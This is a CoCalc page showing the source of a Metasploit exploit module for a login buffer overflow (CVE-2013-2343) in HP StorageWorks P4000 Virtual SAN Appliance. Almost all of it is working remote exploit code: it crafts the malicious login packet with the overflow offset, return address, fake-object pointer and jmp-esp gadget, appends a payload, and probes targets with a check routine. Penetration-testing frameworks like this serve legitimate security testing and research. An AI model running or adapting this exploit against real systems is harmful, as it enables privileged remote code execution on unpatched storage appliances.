CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info={})11super(update_info(info,12'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",13'Description' => %q{14This module exploits a buffer overflow vulnerability found in HP's StorageWorks15P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage16of the sscanf() function when parsing login requests. This module has been tested17successfully on the HP VSA 9 Virtual Appliance.18},19'License' => MSF_LICENSE,20'Author' =>21[22'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery23'juan vazquez' # Metasploit module24],25'References' =>26[27['CVE', '2013-2343'],28['OSVDB', '94701'],29['ZDI', '13-179'],30['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']31],32'Payload' =>33{34'BadChars' => "\x2f\x00\x0d\x0a",35'Space' => 780,36'DisableNops' => true,37'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350038},39'DefaultOptions' =>40{41'EXITFUNC' => 'thread'42},43'Platform' => ['linux'],44'Arch' => ARCH_X86,45'Targets' =>46[47[ 'HP VSA 9',48{49'Version' => '9.0.0',50'Offset' => 3446,51'Ret' => 0x0804EB34, # pop ebp # ret # from hydra52'FakeObject' => 0x08072E58, # from hydra data53'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra54}55]56],57'Privileged' => true,58'DisclosureDate' => '2013-06-28',59'DefaultTarget' => 0))6061register_options(62[63OptPort.new('RPORT', [true, 'The remote port', 13838])64])65end6667def check68connect69packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")70vprint_status("#{rhost}:#{rport} Sending login packet to check...")71sock.put(packet)72res = sock.get_once73disconnect7475if res and res=~ /OK/ and res =~ /Login/76return Exploit::CheckCode::Appears77elsif res and res =~ /FAILED/ and res =~ /version/78return Exploit::CheckCode::Detected79end8081return Exploit::CheckCode::Safe82end8384def generate_packet(data)85pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"86pkt << [data.length + 1].pack("N*")87pkt << "\x00\x00\x00\x00"88pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"89pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"90pkt << data91pkt << "\x00"9293pkt94end9596def exploit97connect98print_status("#{rhost}:#{rport} Sending login packet")99my_bof = rand_text(target['Offset'])100my_bof << [target.ret].pack("V")101my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret102my_bof << [target['JmpEsp']].pack("V")103my_bof << payload.encoded104105packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap106sock.put(packet)107disconnect108end109end110111112113